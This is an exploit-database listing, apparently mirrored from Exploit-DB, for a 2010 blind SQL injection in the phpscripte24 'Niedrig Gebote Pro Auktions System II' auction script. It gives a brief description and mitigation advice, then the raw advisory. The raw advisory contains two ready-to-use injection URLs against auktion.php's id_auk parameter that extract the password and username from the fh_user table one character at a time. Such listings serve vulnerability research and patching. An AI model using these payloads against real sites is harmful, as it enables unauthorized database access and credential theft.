header-logo
Suggest Exploit
vendor:
Niedrig Gebote Pro Auktions System II
by:
Easy Laster
7,5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Niedrig Gebote Pro Auktions System II
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2010

phpscripte24 Niedrig Gebote Pro Auktions System II Blind SQL Injection auktion.php

A Blind SQL Injection vulnerability exists in phpscripte24 Niedrig Gebote Pro Auktions System II, which allows an attacker to extract sensitive information from the database. This can be exploited by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. This can be used to extract the username and password from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : phpscripte24 Niedrig Gebote Pro Auktions System II Blind SQL Injection auktion.php
+Autor : Easy Laster
+Date   : 18.03.2010
+Script  : phpscripte24 Niedrig Gebote Pro Auktions System II
+Download : ------------------
+Price : � 499.90
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne.

---------------------------------------------------------------------------------------

 ___ ___ ___ ___                         _ _           _____           _         _
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|
                                              |___|                 |___|


----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/auktion/auktion.php?id_auk=

#Password
+Exploitable   : http://www.site.com/auktion/auktion.php?id_auk=1+and+1=1+and+ascii
(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1

#Username
http://www.site.com/auktion/auktion.php?id_auk=1+and+1=1+and+ascii
(substring((SELECT vorname FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1


----------------------------------------------------------------------------------------